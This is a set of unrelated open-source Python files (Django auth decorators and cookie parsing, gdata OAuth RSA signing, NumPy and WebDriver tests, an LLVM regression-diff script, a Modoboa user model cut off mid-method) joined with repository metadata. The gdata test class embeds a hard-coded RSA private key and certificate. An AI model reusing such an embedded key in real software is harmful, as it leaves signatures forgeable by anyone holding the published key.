'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, fn, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(fn, 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
|
piyush82/icclab-rcb-web
|
virtualenv/lib/python2.7/site-packages/pip/vendor/distlib/util.py
|
Python
|
apache-2.0
| 42,456
|
from functools import wraps
from urllib.parse import urlparse
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.shortcuts import resolve_url
def user_passes_test(test_func, login_url=None, redirect_field_name=REDIRECT_FIELD_NAME):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
@wraps(view_func)
def _wrapped_view(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
path = request.build_absolute_uri()
resolved_login_url = resolve_url(login_url or settings.LOGIN_URL)
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
login_scheme, login_netloc = urlparse(resolved_login_url)[:2]
current_scheme, current_netloc = urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
path, resolved_login_url, redirect_field_name)
return _wrapped_view
return decorator
def login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated,
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def permission_required(perm, login_url=None, raise_exception=False):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
If the raise_exception parameter is given the PermissionDenied exception
is raised.
"""
def check_perms(user):
if isinstance(perm, str):
perms = (perm,)
else:
perms = perm
# First check if the user has the permission (even anon users)
if user.has_perms(perms):
return True
# In case the 403 handler should be called raise the exception
if raise_exception:
raise PermissionDenied
# As the last resort, show the login form
return False
return user_passes_test(check_perms, login_url=login_url)
|
sametmax/Django--an-app-at-a-time
|
ignore_this_directory/django/contrib/auth/decorators.py
|
Python
|
mit
| 2,892
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies actions which are not depended on by other targets get executed.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('bare.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('bare.gyp', chdir='relocate/src')
file_content = 'Hello from bare.py\n'
test.built_file_must_match('out.txt', file_content, chdir='relocate/src')
test.pass_test()
|
ibc/MediaSoup
|
worker/deps/gyp/test/actions-bare/gyptest-bare.py
|
Python
|
isc
| 558
|
#!/usr/bin/python
"""
requires tlslite - http://trevp.net/tlslite/
"""
import binascii
try:
from gdata.tlslite.utils import keyfactory
except ImportError:
from tlslite.tlslite.utils import keyfactory
try:
from gdata.tlslite.utils import cryptomath
except ImportError:
from tlslite.tlslite.utils import cryptomath
# XXX andy: ugly local import due to module name, oauth.oauth
import gdata.oauth as oauth
class OAuthSignatureMethod_RSA_SHA1(oauth.OAuthSignatureMethod):
def get_name(self):
return "RSA-SHA1"
def _fetch_public_cert(self, oauth_request):
# not implemented yet, ideas are:
# (1) do a lookup in a table of trusted certs keyed off of consumer
# (2) fetch via http using a url provided by the requester
# (3) some sort of specific discovery code based on request
#
# either way should return a string representation of the certificate
raise NotImplementedError
def _fetch_private_cert(self, oauth_request):
# not implemented yet, ideas are:
# (1) do a lookup in a table of trusted certs keyed off of consumer
#
# either way should return a string representation of the certificate
raise NotImplementedError
def build_signature_base_string(self, oauth_request, consumer, token):
sig = (
oauth.escape(oauth_request.get_normalized_http_method()),
oauth.escape(oauth_request.get_normalized_http_url()),
oauth.escape(oauth_request.get_normalized_parameters()),
)
key = ''
raw = '&'.join(sig)
return key, raw
def build_signature(self, oauth_request, consumer, token):
key, base_string = self.build_signature_base_string(oauth_request,
consumer,
token)
# Fetch the private key cert based on the request
cert = self._fetch_private_cert(oauth_request)
# Pull the private key from the certificate
privatekey = keyfactory.parsePrivateKey(cert)
# Convert base_string to bytes
#base_string_bytes = cryptomath.createByteArraySequence(base_string)
# Sign using the key
signed = privatekey.hashAndSign(base_string)
return binascii.b2a_base64(signed)[:-1]
def check_signature(self, oauth_request, consumer, token, signature):
decoded_sig = base64.b64decode(signature);
key, base_string = self.build_signature_base_string(oauth_request,
consumer,
token)
# Fetch the public key cert based on the request
cert = self._fetch_public_cert(oauth_request)
# Pull the public key from the certificate
publickey = keyfactory.parsePEMKey(cert, public=True)
# Check the signature
ok = publickey.hashAndVerify(decoded_sig, base_string)
return ok
class TestOAuthSignatureMethod_RSA_SHA1(OAuthSignatureMethod_RSA_SHA1):
def _fetch_public_cert(self, oauth_request):
cert = """
-----BEGIN CERTIFICATE-----
MIIBpjCCAQ+gAwIBAgIBATANBgkqhkiG9w0BAQUFADAZMRcwFQYDVQQDDA5UZXN0
IFByaW5jaXBhbDAeFw03MDAxMDEwODAwMDBaFw0zODEyMzEwODAwMDBaMBkxFzAV
BgNVBAMMDlRlc3QgUHJpbmNpcGFsMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC0YjCwIfYoprq/FQO6lb3asXrxLlJFuCvtinTF5p0GxvQGu5O3gYytUvtC2JlY
zypSRjVxwxrsuRcP3e641SdASwfrmzyvIgP08N4S0IFzEURkV1wp/IpH7kH41Etb
mUmrXSwfNZsnQRE5SYSOhh+LcK2wyQkdgcMv11l4KoBkcwIDAQABMA0GCSqGSIb3
DQEBBQUAA4GBAGZLPEuJ5SiJ2ryq+CmEGOXfvlTtEL2nuGtr9PewxkgnOjZpUy+d
4TvuXJbNQc8f4AMWL/tO9w0Fk80rWKp9ea8/df4qMq5qlFWlx6yOLQxumNOmECKb
WpkUQDIDJEoFUzKMVuJf4KO/FJ345+BNLGgbJ6WujreoM1X/gYfdnJ/J
-----END CERTIFICATE-----
"""
return cert
def _fetch_private_cert(self, oauth_request):
cert = """
-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----
"""
return cert
|
boxed/CMi
|
web_frontend/gdata/oauth/rsa.py
|
Python
|
mit
| 4,676
|
from __future__ import absolute_import, unicode_literals
from django.utils.encoding import force_str
from django.utils import six
from django.utils.six.moves import http_cookies
# Some versions of Python 2.7 and later won't need this encoding bug fix:
_cookie_encodes_correctly = http_cookies.SimpleCookie().value_encode(';') == (';', '"\\073"')
# See ticket #13007, http://bugs.python.org/issue2193 and http://trac.edgewall.org/ticket/2256
_tc = http_cookies.SimpleCookie()
try:
_tc.load(str('foo:bar=1'))
_cookie_allows_colon_in_names = True
except http_cookies.CookieError:
_cookie_allows_colon_in_names = False
if _cookie_encodes_correctly and _cookie_allows_colon_in_names:
SimpleCookie = http_cookies.SimpleCookie
else:
Morsel = http_cookies.Morsel
class SimpleCookie(http_cookies.SimpleCookie):
if not _cookie_encodes_correctly:
def value_encode(self, val):
# Some browsers do not support quoted-string from RFC 2109,
# including some versions of Safari and Internet Explorer.
# These browsers split on ';', and some versions of Safari
# are known to split on ', '. Therefore, we encode ';' and ','
# SimpleCookie already does the hard work of encoding and decoding.
# It uses octal sequences like '\\012' for newline etc.
# and non-ASCII chars. We just make use of this mechanism, to
# avoid introducing two encoding schemes which would be confusing
# and especially awkward for javascript.
# NB, contrary to Python docs, value_encode returns a tuple containing
# (real val, encoded_val)
val, encoded = super(SimpleCookie, self).value_encode(val)
encoded = encoded.replace(";", "\\073").replace(",","\\054")
# If encoded now contains any quoted chars, we need double quotes
# around the whole string.
if "\\" in encoded and not encoded.startswith('"'):
encoded = '"' + encoded + '"'
return val, encoded
if not _cookie_allows_colon_in_names:
def load(self, rawdata):
self.bad_cookies = set()
if six.PY2 and isinstance(rawdata, six.text_type):
rawdata = force_str(rawdata)
super(SimpleCookie, self).load(rawdata)
for key in self.bad_cookies:
del self[key]
# override private __set() method:
# (needed for using our Morsel, and for laxness with CookieError
def _BaseCookie__set(self, key, real_value, coded_value):
key = force_str(key)
try:
M = self.get(key, Morsel())
M.set(key, real_value, coded_value)
dict.__setitem__(self, key, M)
except http_cookies.CookieError:
self.bad_cookies.add(key)
dict.__setitem__(self, key, http_cookies.Morsel())
def parse_cookie(cookie):
if cookie == '':
return {}
if not isinstance(cookie, http_cookies.BaseCookie):
try:
c = SimpleCookie()
c.load(cookie)
except http_cookies.CookieError:
# Invalid cookie
return {}
else:
c = cookie
cookiedict = {}
for key in c.keys():
cookiedict[key] = c.get(key).value
return cookiedict
|
edisonlz/fruit
|
web_project/base/site-packages/django/http/cookie.py
|
Python
|
apache-2.0
| 3,531
|
#! /usr/bin/env python
from __future__ import division, absolute_import, print_function
# System imports
from distutils.util import get_platform
import os
import sys
import unittest
# Import NumPy
import numpy as np
major, minor = [ int(d) for d in np.__version__.split(".")[:2] ]
if major == 0: BadListError = TypeError
else: BadListError = ValueError
# Add the distutils-generated build directory to the python search path and then
# import the extension module
libDir = "lib.%s-%s" % (get_platform(), sys.version[:3])
sys.path.insert(0, os.path.join("build", libDir))
import Farray
######################################################################
class FarrayTestCase(unittest.TestCase):
def setUp(self):
self.nrows = 5
self.ncols = 4
self.array = Farray.Farray(self.nrows, self.ncols)
def testConstructor1(self):
"Test Farray size constructor"
self.failUnless(isinstance(self.array, Farray.Farray))
def testConstructor2(self):
"Test Farray copy constructor"
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i + j
arrayCopy = Farray.Farray(self.array)
self.failUnless(arrayCopy == self.array)
def testConstructorBad1(self):
"Test Farray size constructor, negative nrows"
self.assertRaises(ValueError, Farray.Farray, -4, 4)
def testConstructorBad2(self):
"Test Farray size constructor, negative ncols"
self.assertRaises(ValueError, Farray.Farray, 4, -4)
def testNrows(self):
"Test Farray nrows method"
self.failUnless(self.array.nrows() == self.nrows)
def testNcols(self):
"Test Farray ncols method"
self.failUnless(self.array.ncols() == self.ncols)
def testLen(self):
"Test Farray __len__ method"
self.failUnless(len(self.array) == self.nrows*self.ncols)
def testSetGet(self):
"Test Farray __setitem__, __getitem__ methods"
m = self.nrows
n = self.ncols
for i in range(m):
for j in range(n):
self.array[i, j] = i*j
for i in range(m):
for j in range(n):
self.failUnless(self.array[i, j] == i*j)
def testSetBad1(self):
"Test Farray __setitem__ method, negative row"
self.assertRaises(IndexError, self.array.__setitem__, (-1, 3), 0)
def testSetBad2(self):
"Test Farray __setitem__ method, negative col"
self.assertRaises(IndexError, self.array.__setitem__, (1, -3), 0)
def testSetBad3(self):
"Test Farray __setitem__ method, out-of-range row"
self.assertRaises(IndexError, self.array.__setitem__, (self.nrows+1, 0), 0)
def testSetBad4(self):
"Test Farray __setitem__ method, out-of-range col"
self.assertRaises(IndexError, self.array.__setitem__, (0, self.ncols+1), 0)
def testGetBad1(self):
"Test Farray __getitem__ method, negative row"
self.assertRaises(IndexError, self.array.__getitem__, (-1, 3))
def testGetBad2(self):
"Test Farray __getitem__ method, negative col"
self.assertRaises(IndexError, self.array.__getitem__, (1, -3))
def testGetBad3(self):
"Test Farray __getitem__ method, out-of-range row"
self.assertRaises(IndexError, self.array.__getitem__, (self.nrows+1, 0))
def testGetBad4(self):
"Test Farray __getitem__ method, out-of-range col"
self.assertRaises(IndexError, self.array.__getitem__, (0, self.ncols+1))
def testAsString(self):
"Test Farray asString method"
result = """\
[ [ 0, 1, 2, 3 ],
[ 1, 2, 3, 4 ],
[ 2, 3, 4, 5 ],
[ 3, 4, 5, 6 ],
[ 4, 5, 6, 7 ] ]
"""
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i+j
self.failUnless(self.array.asString() == result)
def testStr(self):
"Test Farray __str__ method"
result = """\
[ [ 0, -1, -2, -3 ],
[ 1, 0, -1, -2 ],
[ 2, 1, 0, -1 ],
[ 3, 2, 1, 0 ],
[ 4, 3, 2, 1 ] ]
"""
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i-j
self.failUnless(str(self.array) == result)
def testView(self):
"Test Farray view method"
for i in range(self.nrows):
for j in range(self.ncols):
self.array[i, j] = i+j
a = self.array.view()
self.failUnless(isinstance(a, np.ndarray))
self.failUnless(a.flags.f_contiguous)
for i in range(self.nrows):
for j in range(self.ncols):
self.failUnless(a[i, j] == i+j)
######################################################################
if __name__ == "__main__":
# Build the test suite
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(FarrayTestCase))
# Execute the test suite
print("Testing Classes of Module Farray")
print("NumPy version", np.__version__)
print()
result = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(bool(result.errors + result.failures))
|
ddasilva/numpy
|
tools/swig/test/testFarray.py
|
Python
|
bsd-3-clause
| 5,156
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Password Encryption',
'version': '1.1',
'author': ['OpenERP SA', 'FS3'],
'maintainer': 'OpenERP SA',
'website': 'http://www.openerp.com',
'category': 'Tools',
'description': """
Ecrypted passwords
==================
Interaction with LDAP authentication:
-------------------------------------
This module is currently not compatible with the ``user_ldap`` module and
will disable LDAP authentication completely if installed at the same time.
""",
'depends': ['base'],
'data': [],
'auto_install': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
jmesteve/saas3
|
openerp/addons/auth_crypt/__openerp__.py
|
Python
|
agpl-3.0
| 1,628
|
#!/usr/bin/env python
import re, string, sys, os, time, math
DEBUG = 0
(tp, exp) = ('compile', 'exec')
def parse(file):
f = open(file, 'r')
d = f.read()
# Cleanup weird stuff
d = re.sub(r',\d+:\d', '', d)
r = re.findall(r'TEST-(PASS|FAIL|RESULT.*?):\s+(.*?)\s+(.*?)\r*\n', d)
test = {}
fname = ''
for t in r:
if DEBUG:
print t
if t[0] == 'PASS' or t[0] == 'FAIL' :
tmp = t[2].split('llvm-test/')
if DEBUG:
print tmp
if len(tmp) == 2:
fname = tmp[1].strip('\r\n')
else:
fname = tmp[0].strip('\r\n')
if not test.has_key(fname):
test[fname] = {}
test[fname][t[1] + ' state'] = t[0]
test[fname][t[1] + ' time'] = float('nan')
else :
try:
n = t[0].split('RESULT-')[1]
if DEBUG:
print "n == ", n;
if n == 'compile-success':
test[fname]['compile time'] = float(t[2].split('program')[1].strip('\r\n'))
elif n == 'exec-success':
test[fname]['exec time'] = float(t[2].split('program')[1].strip('\r\n'))
if DEBUG:
print test[fname][string.replace(n, '-success', '')]
else :
# print "ERROR!"
sys.exit(1)
except:
continue
return test
# Diff results and look for regressions.
def diffResults(d_old, d_new):
regressions = {}
passes = {}
removed = ''
for x in ['compile state', 'compile time', 'exec state', 'exec time']:
regressions[x] = ''
passes[x] = ''
for t in sorted(d_old.keys()) :
if d_new.has_key(t):
# Check if the test passed or failed.
for x in ['compile state', 'compile time', 'exec state', 'exec time']:
if not d_old[t].has_key(x) and not d_new[t].has_key(x):
continue
if d_old[t].has_key(x):
if d_new[t].has_key(x):
if d_old[t][x] == 'PASS':
if d_new[t][x] != 'PASS':
regressions[x] += t + "\n"
else:
if d_new[t][x] == 'PASS':
passes[x] += t + "\n"
else :
regressions[x] += t + "\n"
if x == 'compile state' or x == 'exec state':
continue
# For execution time, if there is no result it's a fail.
if not d_old[t].has_key(x) and not d_new[t].has_key(x):
continue
elif not d_new[t].has_key(x):
regressions[x] += t + "\n"
elif not d_old[t].has_key(x):
passes[x] += t + "\n"
if math.isnan(d_old[t][x]) and math.isnan(d_new[t][x]):
continue
elif math.isnan(d_old[t][x]) and not math.isnan(d_new[t][x]):
passes[x] += t + "\n"
elif not math.isnan(d_old[t][x]) and math.isnan(d_new[t][x]):
regressions[x] += t + ": NaN%\n"
if d_new[t][x] > d_old[t][x] and d_old[t][x] > 0.0 and \
(d_new[t][x] - d_old[t][x]) / d_old[t][x] > .05:
regressions[x] += t + ": " + "{0:.1f}".format(100 * (d_new[t][x] - d_old[t][x]) / d_old[t][x]) + "%\n"
else :
removed += t + "\n"
if len(regressions['compile state']) != 0:
print 'REGRESSION: Compilation Failed'
print regressions['compile state']
if len(regressions['exec state']) != 0:
print 'REGRESSION: Execution Failed'
print regressions['exec state']
if len(regressions['compile time']) != 0:
print 'REGRESSION: Compilation Time'
print regressions['compile time']
if len(regressions['exec time']) != 0:
print 'REGRESSION: Execution Time'
print regressions['exec time']
if len(passes['compile state']) != 0:
print 'NEW PASSES: Compilation'
print passes['compile state']
if len(passes['exec state']) != 0:
print 'NEW PASSES: Execution'
print passes['exec state']
if len(removed) != 0:
print 'REMOVED TESTS'
print removed
# Main
if len(sys.argv) < 3 :
print 'Usage:', sys.argv[0], '<old log> <new log>'
sys.exit(-1)
d_old = parse(sys.argv[1])
d_new = parse(sys.argv[2])
diffResults(d_old, d_new)
|
dslab-epfl/asap
|
utils/release/findRegressions-simple.py
|
Python
|
bsd-2-clause
| 4,045
|
import os
import sys
import random
import unittest
sys.path.insert(1, os.path.abspath(os.path.join(__file__, "../..")))
import base_test
repo_root = os.path.abspath(os.path.join(__file__, "../../.."))
sys.path.insert(1, os.path.join(repo_root, "tools", "webdriver"))
from webdriver import exceptions
class SendKeysTest(base_test.WebDriverBaseTest):
def setUp(self):
self.driver.get(self.webserver.where_is("user_input/res/text-form.html"))
def test_send_simple_string(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("lorem ipsum")
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"lorem ipsum")
def test_send_return(self):
element = self.driver.find_element_by_id("Text1")
returnkey = unichr(int("E006", 16))
element.send_keys([returnkey])
self.assertEquals(u"" + self.driver.get_current_url(), u"" + self.webserver.where_is("user_input/res/text-form-landing.html?e=mc2"))
def test_send_backspace(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("world ")
element.send_keys("wide ")
element.send_keys("web ")
element.send_keys("consortium")
backspace= unichr(int("E003", 16))
for i in range(0, 11):
element.send_keys([backspace])
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"world wide web")
def test_send_tab(self):
element1 = self.driver.find_element_by_id("Text1")
element2 = self.driver.find_element_by_id("Text2")
element1.send_keys("typing here")
tab= unichr(int("E004", 16))
element1.send_keys([tab])
output = self.driver.find_element_by_id("output")
tab_pressed = output.get_attribute("checked")
self.assertEquals(tab_pressed, u"true")
def test_send_shift(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("low ")
shift= unichr(int("E008", 16))
element.send_keys([shift , "u", "p", shift])
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"low UP")
def test_send_arrow_keys(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("internet")
backspace= unichr(int("E003", 16))
left= unichr(int("E012", 16))
right= unichr(int("E014", 16))
for i in range(0, 4):
element.send_keys([left])
element.send_keys([backspace])
element.send_keys([right])
element.send_keys("a")
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"intranet")
def test_select_text_with_shift(self):
element = self.driver.find_element_by_id("Text1")
element.send_keys("WebDriver")
backspace= unichr(int("E003", 16))
shift= unichr(int("E008", 16))
left= unichr(int("E012", 16))
element.send_keys([shift, left, left, left, left, left, left, backspace])
self.assertEquals(self.driver.find_element_by_id("text").get_text(), u"Web")
if __name__ == "__main__":
unittest.main()
|
youtube/cobalt
|
third_party/web_platform_tests/webdriver/user_input/sendkeys_test.py
|
Python
|
bsd-3-clause
| 3,188
|
"""Core models."""
import re
from email.header import Header
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_str, smart_bytes, smart_text
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _, ugettext_lazy
from django.contrib.auth.models import AbstractUser, Group
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
import jsonfield
from phonenumber_field.modelfields import PhoneNumberField
from reversion import revisions as reversion
from modoboa.core.password_hashers import get_password_hasher
from modoboa.lib.exceptions import (
BadRequest, Conflict, InternalError, PermDeniedException
)
from modoboa.parameters import tools as param_tools
from . import constants, signals
try:
from modoboa.lib.ldap_utils import LDAPAuthBackend
ldap_available = True
except ImportError:
ldap_available = False
class User(AbstractUser):
"""Custom User model.
It overloads the way passwords are stored into the database. The
main reason to change this mechanism is to ensure the
compatibility with the way Dovecot stores passwords.
It also adds new attributes and methods.
"""
username = models.CharField(max_length=254, unique=True)
email = models.EmailField(max_length=254, blank=True, db_index=True)
is_staff = models.BooleanField(default=False, db_index=True)
is_active = models.BooleanField(default=True, db_index=True)
is_local = models.BooleanField(default=True, db_index=True)
master_user = models.BooleanField(
ugettext_lazy("Allow mailboxes access"), default=False,
help_text=ugettext_lazy(
"Allow this administrator to access user mailboxes"
)
)
password = models.CharField(ugettext_lazy("password"), max_length=256)
language = models.CharField(
ugettext_lazy("language"),
max_length=10, default="en", choices=constants.LANGUAGES,
help_text=ugettext_lazy(
"Prefered language to display pages."
)
)
phone_number = PhoneNumberField(
ugettext_lazy("Phone number"), blank=True, null=True)
secondary_email = models.EmailField(
ugettext_lazy("Secondary email"), max_length=254,
blank=True, null=True,
help_text=ugettext_lazy(
"An alternative e-mail address, can be used for recovery needs.")
)
tfa_enabled = models.BooleanField(default=False)
_parameters = jsonfield.JSONField(default={})
class Meta(object):
ordering = ["username"]
index_together = [
["email", "is_active"]
]
password_expr = re.compile(r'\{([\w\-]+)\}(.+)')
def __init__(self, *args, **kwargs):
"""Load parameter manager."""
super(User, self).__init__(*args, **kwargs)
self.parameters = param_tools.Manager("user", self._parameters)
def _crypt_password(self, raw_value):
"""Crypt the local password using the appropriate scheme.
In case we don't find the scheme (for example when the
management framework is used), we load the parameters and try
one more time.
"""
scheme = param_tools.get_global_parameter(
"password_scheme", raise_exception=False)
if scheme is None:
from modoboa.core.apps import load_core_settings
load_core_settings()
scheme = param_tools.get_global_parameter(
"password_scheme", raise_exception=False)
raw_value = smart_bytes(raw_value)
return get_password_hasher(scheme.upper())().encrypt(raw_value)
def set_password(self, raw_value, curvalue=None):
"""Password update
Update the current mailbox's password with the given clear
value. This value is encrypted according to the defined method
before it is saved.
:param raw_value: the new password's value
:param curvalue: the current password (for LDAP authentication)
"""
ldap_sync_enable = param_tools.get_global_parameter("ldap_enable_sync")
if self.is_local or ldap_sync_enable:
self.password = self._crypt_password(raw_value)
else:
if not ldap_available:
raise InternalError(
_("Failed to update password: LDAP module not installed")
)
LDAPAuthBackend().update_user_password(
self.username, curvalue, raw_value
)
signals.account_password_updated.send(
sender=self.__class__,
account=self, password=raw_value, created=self.pk is None)
def check_password(self, raw_value):
"""Compare raw_value to current password."""
match = self.password_expr.match(self.password)
if match is None:
return False
raw_value = force_str(raw_value)
scheme = match.group(1)
val2 = match.group(2)
hasher = get_password_hasher(scheme)
return hasher().verify(raw_value, val2)
def __str__(self):
return smart_text(self.get_username())
def get_absolute_url(self):
"""Return detail url for this user."""
return reverse("admin:account_detail", args=[self.pk])
@property
def type(self):
return "account"
@property
def tags(self):
return [{"name": "account", "label": _("account"), "type": "idt"},
{"name": self.role, "label": self.role,
"type": "grp", "color": "info"}]
@property
def fullname(self):
result = self.username
if self.first_name != "":
result = self.first_name
if self.last_name != "":
if result != "":
result += " "
result += self.last_name
return result
@property
def identity(self):
return self.username
@property
def name_or_rcpt(self):
if self.first_name != "":
return "%s %s" % (self.first_name, self.last_name)
return "----"
@property
def enabled(self):
return self.is_active
@property
def encoded_address(self):
if self.first_name != "" or self.last_name != "":
return '"{}" <{}>'.format(
Header(self.fullname, "utf8").encode(), self.email)
return self.email
def is_owner(self, obj):
"""Tell is the user is the unique owner of this object
:param obj: an object inheriting from ``models.Model``
:return: a boolean
"""
ct = ContentType.objects.get_for_model(obj)
try:
ooentry = self.objectaccess_set.get(
content_type=ct, object_id=obj.id)
except ObjectAccess.DoesNotExist:
return False
return ooentry.is_owner
def can_access(self, obj):
"""Check if the user can access a specific object
This function is recursive: if the given user hasn't got
direct access to this object and if he has got access to other
``User`` objects, we check if one of those users owns the
object.
:param obj: a admin object
:return: a boolean
"""
if self.is_superuser:
return True
ct = ContentType.objects.get_for_model(obj)
try:
ooentry = self.objectaccess_set.get(
content_type=ct, object_id=obj.id)
except ObjectAccess.DoesNotExist:
pass
else:
return True
if ct.model == "user":
return False
ct = ContentType.objects.get_for_model(self)
qs = self.objectaccess_set.filter(content_type=ct)
for ooentry in qs.all():
if ooentry.content_object.is_owner(obj):
return True
return False
@property
def role(self):
"""Return user role."""
if not hasattr(self, "_role"):
if self.is_superuser:
self._role = "SuperAdmins"
else:
try:
self._role = self.groups.all()[0].name
except IndexError:
self._role = "---"
return self._role
@role.setter
def role(self, role):
"""Set administrative role for this account
:param string role: the role to set
"""
if role is None or self.role == role:
return
signals.account_role_changed.send(
sender=self.__class__, account=self, role=role)
self.groups.clear()
if role == "SuperAdmins":
self.is_superuser = True
else:
if self.is_superuser or role == "SimpleUsers":
ObjectAccess.objects.filter(user=self).delete()
self.is_superuser = False
try:
self.groups.add(Group.objects.get(name=role))
except Group.DoesNotExist:
self.groups.add(Group.objects.get(name="SimpleUsers"))
if role != "SimpleUsers" and not self.can_access(self):
from modoboa.lib.permissions import grant_access_to_object
grant_access_to_object(self, self)
self.save()
self._role = role
def get_role_display(self):
"""Return the display name of this role."""
for role in constants.ROLES:
if role[0] == self.role:
return role[1]
return _("Unknown")
@cached_property
def is_admin(self):
"""Shortcut to check if user is administrator."""
return self.role in constants.ADMIN_GROUPS
def post_create(self, creator):
"""Grant permission on this user to creator."""
from modoboa.lib.permissions import grant_access_to_object
grant_access_to_object(creator, self, is_owner=True)
def save(self, *args, **kwargs):
creator = kwargs.pop("creator", None)
super(User, self).save(*args, **kwargs)
if creator is not None:
self.post_create(creator)
def from_csv(self, user, row, crypt_password=True):
"""Create a new account from a CSV file entry.
The expected order is the following::
"account", loginname, password, first name, last name, enabled, role
Additional fields can be added using the *account_imported* signal.
:param user: a ``core.User`` instance
:param row: a list containing the expected information
:param crypt_password:
"""
from modoboa.lib.permissions import get_account_roles
if len(row) < 7:
raise BadRequest(_("Invalid line"))
desired_role = row[6].strip()
if not user.is_superuser:
allowed_roles = get_account_roles(user)
allowed_roles = [role[0] for role in allowed_roles]
if desired_role not in allowed_roles:
raise PermDeniedException(_(
"You can't import an account with a role greater than "
"yours"
))
self.username = row[1].strip().lower()
try:
User.objects.get(username=self.username)
except User.DoesNotExist:
pass
else:
raise Conflict
if desired_role == "SimpleUsers":
if len(row) < 8 or not row[7].strip():
raise BadRequest(
_("The simple user '%s' must have a valid email address"
% self.username)
)
if self.username != row[7].strip():
raise BadRequest(
_("username and email fields must not differ for '%s'"
% self.username)
)
if crypt_password:
